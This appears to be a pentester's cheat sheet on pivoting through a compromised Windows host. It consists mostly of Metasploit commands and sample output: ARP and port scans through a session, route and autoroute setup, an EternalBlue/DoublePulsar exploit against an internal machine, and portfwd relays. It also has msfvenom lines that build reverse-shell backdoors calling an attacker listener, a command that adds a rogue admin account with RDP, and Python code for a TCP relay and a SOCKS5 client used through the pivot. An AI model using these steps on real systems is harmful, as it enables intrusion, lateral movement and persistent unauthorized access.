Pivoting notes
*** THIS PAGE WILL NEED TO BE UPDATED!! ***
// discover hosts on the inside network: the ARP scan runs from the compromised host (session <id>), so it sees that host's internal segment
meterpreter > background
msf > use post/windows/gather/arp_scanner
msf (arp_scanner) > set SESSION <id>
msf (arp_scanner) > set RHOSTS 192.168.0.0/24
msf (arp_scanner) > run
// Before running a port scanner from Metasploit against the private systems, instruct Metasploit to route all traffic destined for the private network 192.168.0.0/24 through the existing Meterpreter session between our machine and the compromised server
meterpreter > background
msf > route add 192.168.0.0 255.255.255.0 <session_id>
// Alternative when the pivot is a Linux box we can SSH to: a dynamic (SOCKS) forward, then proxychains
// (proxychains.conf ships with "socks4 127.0.0.1 9050" as its default proxy, which is why 9050 is used here)
ssh -f -N -D 9050 -i pivot user@10.0.0.1
proxychains xfreerdp /u:admin /p:**** /v:10.0.0.1
It is important to note that we configure the routing rule on the Metasploit console (msf >), not in the Meterpreter session. The routing rule has to exist on our system, inside Metasploit, because it is Metasploit that decides which session's channel a connection to the private network is sent through. That is why we issued the "background" command to put our Meterpreter session in the background and return to the Metasploit console.
After configuring the routing rule, we are able to run a TCP port scanner from within Metasploit against the two private systems. The following commands show how to use Metasploit's native port scanner and set the remote hosts' IPs and the port range. We will scan the first 1000 ports, as follows:
// Port scan (connections to 192.168.0.0/24 now go through the Meterpreter session)
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.0.11 192.168.0.12
msf auxiliary(tcp) > set PORTS 1-1000
msf auxiliary(tcp) > run
// double pulsar: EternalBlue/DoublePulsar against an internal host, through the route
// A bind payload is used on purpose: the route lets us connect to 192.168.0.11, but 192.168.0.11
// has no path back to our machine, so a reverse payload would never call home
// (the reverse port-forward further down is how a reverse payload is made to work through a pivot)
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.0.11
msf exploit(eternalblue_doublepulsar) > run
meterpreter > background
[*] Backgrounding session 2...
The exploit ran successfully, and we now have a second Meterpreter session. This time, though, the second session is tunneled inside the first one and pivoted through the web server. To verify that, issue the sessions command to list the existing sessions:
// Check sessions
msf exploit(eternalblue_doublepulsar) > sessions
Active sessions
===============
  Id  Type                     Information         Connection
  --  ----                     -----------         ----------
  1   meterpreter x86/windows  WEB\MyUser @ WEB    10.10.10.10:44989 -> 50.50.50.50:6666
  2   meterpreter x86/windows  HID\MyUser @ HID    192.168.0.10:49163 -> 192.168.0.11:4444
// implement port forwarding rules on our Meterpreter session
// -l: local port on our machine, -p: port on the internal host, -r: the internal host
meterpreter > portfwd add -l 10080 -p 80 -r 192.168.0.12
meterpreter > portfwd add -l 10022 -p 22 -r 192.168.0.12
meterpreter > portfwd add -l 10454 -p 445 -r 192.168.0.12
// Now we are ready to access the resources, always via the local port of the matching rule
// Using firefox, we will enter the URL: http://localhost:10080
// # ssh -p 10022 myadmin@localhost
// # smbclient -L localhost -p 10454
// # smbclient //localhost/<share_name> -U myadmin -p 10454
// Step 1 Set up a Multi Handler on Pentester Machine
// We will need to decide on a port number and set up a listener on that port. The purpose of this
// listener (handler) is to receive a connection with Meterpreter Reverse TCP. However, we will
// notice that it is neither Victim 1 nor Victim 2 who will actually connect to that listener. It
// will be our Metasploit connecting to itself using the already established Meterpreter session
// with Victim 1.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LPORT 5555
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > set LHOST 10.10.10.10
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.10.10:5555
msf5 exploit(multi/handler) >
// Step 2 Set up a Reverse Port-Forward Rule on Victim 1
// -R: reverse forward; -p 6666: the port the pivot (Victim 1) listens on;
// -L 10.10.10.10 -l 5555: where Metasploit, on our side, relays every incoming connection (our handler)
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > portfwd add -R -L 10.10.10.10 -l 5555 -p 6666
[*] Local TCP relay created: 10.10.10.10:5555 <-> :6666
// Now we are ready to move on and generate our backdoor. LHOST is Victim 1's internal address and
// LPORT is the port the pivot listens on, so Victim 2 never needs a path to our machine.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=6666 -f exe -o backdoor.exe
// Once the backdoor runs on the second victim, you should receive the following message in Metasploit:
[*] Meterpreter session 2 opened (10.10.10.10:5555 -> 10.10.10.10:35937) at 2020-12-30 04:10:55 -0500
// The second session is now established, and as you can see it is established from the
// Metasploit system to itself. If you list the available sessions, though, you will see
// the IP address of the second victim as the ultimate target of the session:
msf5 exploit(multi/handler) > sessions
Active sessions
===============
  Id  Name  Type                     Information                     Connection
  --  ----  ----                     -----------                     ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WIN7-PC   10.10.10.10:1234 -> 50.50.50.50:49177 (50.50.50.50)
  2         meterpreter x86/windows  WIN7-PC\win7admin @ WIN7-PC     10.10.10.10:5555 -> 10.10.10.10:35937 (192.168.0.13)
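Both portfwd forms above (the -l/-p/-r form for reaching 192.168.0.12 and the -R form that carries Victim 2's callback to our handler) are the same mechanism: a TCP relay that accepts on one side, connects on the other, and pumps bytes both ways until either end closes. The Python below is an added example written for these notes, not Meterpreter's code, that implements such a relay and exercises it against a constructed local echo server standing in for the internal service. The names TcpRelay, start_echo_server and demo are hypothetical, and the demo payload is constructed. In the forward case the relay sits on our machine and its target is the internal host; in the reverse case the identical relay runs on the pivot and its target is our handler.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then half-close dst so the
    far end sees EOF too (this is what makes teardown propagate through a relay)."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class TcpRelay:
    """Listen on listen_addr; for each accepted client open a fresh connection to
    target_addr and pump bytes in both directions.

    Forward portfwd: relay on the attacker box, target = internal host
                     (portfwd add -l 10080 -p 80 -r 192.168.0.12)
    Reverse portfwd: relay on the pivot, target = attacker's handler
                     (portfwd add -R -L 10.10.10.10 -l 5555 -p 6666)"""

    def __init__(self, listen_addr, target_addr):
        self.target_addr = target_addr
        self.relayed = 0  # client connections relayed so far
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind(listen_addr)
        self._srv.listen(5)
        self.listen_addr = self._srv.getsockname()  # real port if 0 was requested
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while True:
            try:
                client, _ = self._srv.accept()
            except OSError:  # listener closed
                return
            try:
                upstream = socket.create_connection(self.target_addr, timeout=5)
            except OSError:
                client.close()  # target unreachable: drop this client, keep serving
                continue
            self.relayed += 1
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    def close(self):
        self._srv.close()


def start_echo_server():
    """Constructed stand-in for the internal service: echoes whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def demo(payload=b"GET / HTTP/1.0\r\nHost: 192.168.0.12\r\n\r\n"):
    """Send payload through the relay to the echo server and return what came back."""
    echo = start_echo_server()
    relay = TcpRelay(("127.0.0.1", 0), echo.getsockname())
    try:
        with socket.create_connection(relay.listen_addr, timeout=5) as s:
            s.sendall(payload)
            s.shutdown(socket.SHUT_WR)  # EOF travels client -> relay -> echo and back
            received = b""
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                received += chunk
        return received
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    print(demo())
```

The half-close in _pump is the detail that matters in practice: a relay that only closes when both directions are idle leaves half-dead sessions on the pivot, which is exactly what shows up as stale "portfwd list" entries and hung clients.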
// Reverse & bind shell payloads: bind_tcp is what works through a route (we connect to the target);
// reverse_tcp needs the target to reach us, directly or via a reverse portfwd as above
set payload windows/x64/shell_bind_tcp
set payload windows/meterpreter/bind_tcp
// way to get RDP: enable RDP and add a local admin user (getgui is an old script; post/windows/manage/enable_rdp is the current module)
meterpreter > run getgui -e -u pwned -p password1337
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=2222 -f exe > shell.exe
// add a route for the internal subnet via the current session, then expose it as a SOCKS proxy
run autoroute -s 10.20.20.0/24
// older Metasploit versions shipped this as auxiliary/server/socks5
use auxiliary/server/socks_proxy
set VERSION 5
set srvport 1081
// proxychains.conf then needs a matching line: socks5 127.0.0.1 1081
// more notes - adding route and using socks proxy
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f raw -o /root/Desktop/msf.bin
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 4444
set LHOST eth0
exploit -j
sessions -i 1
// route 192.168.16.0/24 through session 1, then print the active routes
run autoroute -s 192.168.16.0/24
run autoroute -p
// set up a reverse port forward: the pivot listens on 2222 and Metasploit relays each connection to workstation1:443 (as reachable from our machine)
portfwd add -R -p 2222 -l 443 -L workstation1
background
// start a SOCKS proxy on 9050 (proxychains' default) so non-Metasploit tools can use the route
// ("search socks" lists the module; it is auxiliary/server/socks_proxy)
use auxiliary/server/socks_proxy
set srvport 9050
options
exploit -j
// Metasploit modules need no proxy at all: with the route in place they reach internal hosts directly, e.g. psexec
use exploit/windows/smb/psexec
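What auxiliary/server/socks_proxy (and the ssh -D alternative near the top of these notes) exposes is a SOCKS5 endpoint in front of the Metasploit route; proxychains simply wraps the SOCKS5 handshake around every connect() a tool makes. The Python below is an added example for these notes, not Metasploit or proxychains code, that performs that handshake explicitly: greeting, CONNECT request, reply parsing, and the failure codes that a "host unreachable" through a bad route comes back as. Dotted-quad targets are sent as IPv4, names as domain-type addresses so resolution happens on the proxy side rather than leaking to our own resolver. The proxy address 127.0.0.1:1081 and the target 10.20.20.5:445 in the usage block are assumptions matching the srvport and autoroute values above; the function names are hypothetical.

```python
import socket
import struct

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def build_greeting():
    """VER=5, one method offered: no authentication (the socks_proxy default)."""
    return bytes([SOCKS_VERSION, 0x01, METHOD_NO_AUTH])


def build_connect(host, port):
    """CONNECT request: dotted quads as ATYP_IPV4, anything else as ATYP_DOMAIN
    so the name is resolved on the far side of the pivot (like proxy_dns)."""
    try:
        addr, atyp = socket.inet_aton(host), ATYP_IPV4
    except OSError:
        raw = host.encode("idna")
        if not 1 <= len(raw) <= 255:
            raise ValueError("domain name must be 1..255 bytes")
        addr, atyp = bytes([len(raw)]) + raw, ATYP_DOMAIN
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, atyp]) + addr + struct.pack(">H", port)


def parse_connect_reply(data):
    """Parse VER REP RSV ATYP BND.ADDR BND.PORT -> (rep, bound_addr, bound_port)."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp = data[1], data[3]
    if atyp == ATYP_IPV4:
        end = 8
    elif atyp == ATYP_DOMAIN:
        if len(data) < 5:
            raise ValueError("truncated SOCKS5 reply")
        end = 5 + data[4]
    elif atyp == ATYP_IPV6:
        end = 20
    else:
        raise ValueError("unknown ATYP %#x" % atyp)
    if len(data) < end + 2:
        raise ValueError("truncated SOCKS5 reply")
    if atyp == ATYP_IPV4:
        addr = socket.inet_ntoa(data[4:8])
    elif atyp == ATYP_DOMAIN:
        addr = data[5:end].decode("idna")
    else:
        addr = socket.inet_ntop(socket.AF_INET6, data[4:20])
    return rep, addr, struct.unpack(">H", data[end:end + 2])[0]


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection mid-handshake")
        buf += chunk
    return buf


def socks5_connect(proxy_addr, dst_host, dst_port, timeout=10):
    """Open a TCP connection to dst_host:dst_port through a SOCKS5 proxy and
    return the socket ready for application data (SMB, HTTP, RDP, ...)."""
    s = socket.create_connection(proxy_addr, timeout=timeout)
    try:
        s.sendall(build_greeting())
        ver, method = _recv_exact(s, 2)
        if ver != SOCKS_VERSION or method != METHOD_NO_AUTH:  # 0xFF = nothing acceptable
            raise ConnectionError("proxy did not accept no-auth (method %#x)" % method)
        s.sendall(build_connect(dst_host, dst_port))
        head = _recv_exact(s, 4)
        atyp = head[3]
        if atyp == ATYP_IPV4:
            rest = _recv_exact(s, 4 + 2)
        elif atyp == ATYP_DOMAIN:
            n = _recv_exact(s, 1)
            rest = n + _recv_exact(s, n[0] + 2)
        elif atyp == ATYP_IPV6:
            rest = _recv_exact(s, 16 + 2)
        else:
            raise ValueError("unknown ATYP %#x" % atyp)
        rep, _, _ = parse_connect_reply(head + rest)
        if rep != 0x00:
            raise ConnectionError("SOCKS5 CONNECT failed: %s" % REPLY_TEXT.get(rep, hex(rep)))
        return s
    except Exception:
        s.close()
        raise


if __name__ == "__main__":
    # Assumed setup: socks_proxy on 127.0.0.1:1081 with an autoroute covering 10.20.20.0/24
    sock = socks5_connect(("127.0.0.1", 1081), "10.20.20.5", 445)
    print("connected through the pivot, local end", sock.getsockname())
    sock.close()
```

A non-zero REP is the proxy telling you the pivot could not complete the connection, so "host unreachable" or "connection refused" here means the route or the far side is wrong, not the proxy itself; proxychains hides that distinction behind a generic failure, which is the main reason to drive the handshake by hand when debugging a pivot.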
// internal network mapping and pivoting - double pivoting (Metasploit and manual), reference:
https://www.hdysec.com/double-pivoting-both-metasploit-and-manual/#what-is-pivoting